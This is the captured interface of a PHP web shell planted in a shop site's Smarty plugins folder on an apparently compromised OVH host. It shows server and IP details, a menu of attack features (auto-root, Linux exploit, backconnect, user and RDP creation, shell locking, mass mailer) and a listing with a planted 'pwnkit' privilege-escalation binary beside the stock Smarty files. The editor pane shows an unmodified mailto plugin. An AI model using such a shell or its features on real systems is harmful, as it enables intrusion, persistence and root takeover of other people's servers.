Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.153
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
tools /
smarty /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
block.textformat.php
3.16
KB
-rw----r--
function.counter.php
1.79
KB
-rw----r--
function.cycle.php
3.17
KB
-rw----r--
function.fetch.php
7.77
KB
-rw----r--
function.html_checkboxes.php
7.83
KB
-rw----r--
function.html_image.php
5.19
KB
-rw----r--
function.html_options.php
7.09
KB
-rw----r--
function.html_radios.php
6.95
KB
-rw----r--
function.html_select_date.php
14.23
KB
-rw----r--
function.html_select_time.php
12.94
KB
-rw----r--
function.html_table.php
5.3
KB
-rw----r--
function.implode.php
921
B
-rw----r--
function.mailto.php
5.33
KB
-rw----r--
function.math.php
2.83
KB
-rw----r--
index.php
1.24
KB
-rw----r--
modifier.capitalize.php
2.92
KB
-rw----r--
modifier.date_format.php
2.21
KB
-rw----r--
modifier.debug_print_var.php
3.39
KB
-rw----r--
modifier.escape.php
7.26
KB
-rw----r--
modifier.regex_replace.php
1.52
KB
-rw----r--
modifier.replace.php
834
B
-rw----r--
modifier.spacify.php
761
B
-rw----r--
modifier.truncate.php
2.09
KB
-rw----r--
modifiercompiler.cat.php
636
B
-rw----r--
modifiercompiler.count_charact...
912
B
-rw----r--
modifiercompiler.count_paragra...
672
B
-rw----r--
modifiercompiler.count_sentenc...
754
B
-rw----r--
modifiercompiler.count_words.p...
974
B
-rw----r--
modifiercompiler.default.php
785
B
-rw----r--
modifiercompiler.escape.php
4.87
KB
-rw----r--
modifiercompiler.from_charset....
761
B
-rw----r--
modifiercompiler.indent.php
711
B
-rw----r--
modifiercompiler.lower.php
734
B
-rw----r--
modifiercompiler.noprint.php
407
B
-rw----r--
modifiercompiler.string_format...
585
B
-rw----r--
modifiercompiler.strip.php
818
B
-rw----r--
modifiercompiler.strip_tags.ph...
723
B
-rw----r--
modifiercompiler.to_charset.ph...
755
B
-rw----r--
modifiercompiler.unescape.php
1.16
KB
-rw----r--
modifiercompiler.upper.php
694
B
-rw----r--
modifiercompiler.wordwrap.php
1.53
KB
-rw----r--
outputfilter.trimwhitespace.ph...
3.39
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
shared.escape_special_chars.ph...
1.63
KB
-rw----r--
shared.literal_compiler_param....
1001
B
-rw----r--
shared.make_timestamp.php
1.27
KB
-rw----r--
shared.mb_str_replace.php
1.71
KB
-rw----r--
shared.mb_unicode.php
1.48
KB
-rw----r--
shared.mb_wordwrap.php
2.76
KB
-rw----r--
variablefilter.htmlspecialchar...
432
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : function.mailto.php
<?php /** * Smarty plugin * * @package Smarty * @subpackage PluginsFunction */ /** * Smarty {mailto} function plugin * * Type: function<br> * Name: mailto<br> * Date: May 21, 2002 * Purpose: automate mailto address link creation, and optionally encode them.<br> * Params: * <pre> * - address - (required) - e-mail address * - text - (optional) - text to display, default is address * - encode - (optional) - can be one of: * * none : no encoding (default) * * javascript : encode with javascript * * javascript_charcode : encode with javascript charcode * * hex : encode with hexidecimal (no javascript) * - cc - (optional) - address(es) to carbon copy * - bcc - (optional) - address(es) to blind carbon copy * - subject - (optional) - e-mail subject * - newsgroups - (optional) - newsgroup(s) to post to * - followupto - (optional) - address(es) to follow up to * - extra - (optional) - extra tags for the href link * </pre> * Examples: * <pre> * {mailto address="me@domain.com"} * {mailto address="me@domain.com" encode="javascript"} * {mailto address="me@domain.com" encode="hex"} * {mailto address="me@domain.com" subject="Hello to you!"} * {mailto address="me@domain.com" cc="you@domain.com,they@domain.com"} * {mailto address="me@domain.com" extra='class="mailto"'} * </pre> * * @link http://www.smarty.net/manual/en/language.function.mailto.php {mailto} * (Smarty online manual) * @version 1.2 * @author Monte Ohrt <monte at ohrt dot com> * @author credits to Jason Sweat (added cc, bcc and subject functionality) * @param array $params parameters * @param Smarty_Internal_Template $template template object * @return string */ function smarty_function_mailto($params, $template) { static $_allowed_encoding = array('javascript' => true, 'javascript_charcode' => true, 'hex' => true, 'none' => true); $extra = ''; if (empty($params['address'])) { trigger_error("mailto: missing 'address' parameter",E_USER_WARNING); return; } else { $address = $params['address']; } $text = $address; // netscape and mozilla do not decode %40 (@) in BCC field (bug?) // so, don't encode it. $search = array('%40', '%2C'); $replace = array('@', ','); $mail_parms = array(); foreach ($params as $var => $value) { switch ($var) { case 'cc': case 'bcc': case 'followupto': if (!empty($value)) $mail_parms[] = $var . '=' . str_replace($search, $replace, rawurlencode($value)); break; case 'subject': case 'newsgroups': $mail_parms[] = $var . '=' . rawurlencode($value); break; case 'extra': case 'text': $$var = $value; default: } } if ($mail_parms) { $address .= '?' . join('&', $mail_parms); } $encode = (empty($params['encode'])) ? 'none' : $params['encode']; if (!isset($_allowed_encoding[$encode])) { trigger_error("mailto: 'encode' parameter must be none, javascript, javascript_charcode or hex", E_USER_WARNING); return; } // FIXME: (rodneyrehm) document.write() excues me what? 1998 has passed! if ($encode == 'javascript') { $string = 'document.write(\'<a href="mailto:' . $address . '" ' . $extra . '>' . $text . '</a>\');'; $js_encode = ''; for ($x = 0, $_length = strlen($string); $x < $_length; $x++) { $js_encode .= '%' . bin2hex($string[$x]); } return '<script type="text/javascript">eval(unescape(\'' . $js_encode . '\'))</script>'; } elseif ($encode == 'javascript_charcode') { $string = '<a href="mailto:' . $address . '" ' . $extra . '>' . $text . '</a>'; for($x = 0, $y = strlen($string); $x < $y; $x++) { $ord[] = ord($string[$x]); } $_ret = "<script type=\"text/javascript\" language=\"javascript\">\n" . "{document.write(String.fromCharCode(" . implode(',', $ord) . "))" . "}\n" . "</script>\n"; return $_ret; } elseif ($encode == 'hex') { preg_match('!^(.*)(\?.*)$!', $address, $match); if (!empty($match[2])) { trigger_error("mailto: hex encoding does not work with extra attributes. Try javascript.",E_USER_WARNING); return; } $address_encode = ''; for ($x = 0, $_length = strlen($address); $x < $_length; $x++) { if (preg_match('!\w!' . Smarty::$_UTF8_MODIFIER, $address[$x])) { $address_encode .= '%' . bin2hex($address[$x]); } else { $address_encode .= $address[$x]; } } $text_encode = ''; for ($x = 0, $_length = strlen($text); $x < $_length; $x++) { $text_encode .= '&#x' . bin2hex($text[$x]) . ';'; } $mailto = "mailto:"; return '<a href="' . $mailto . $address_encode . '" ' . $extra . '>' . $text_encode . '</a>'; } else { // no encoding return '<a href="mailto:' . $address . '" ' . $extra . '>' . $text . '</a>'; } } ?>
Close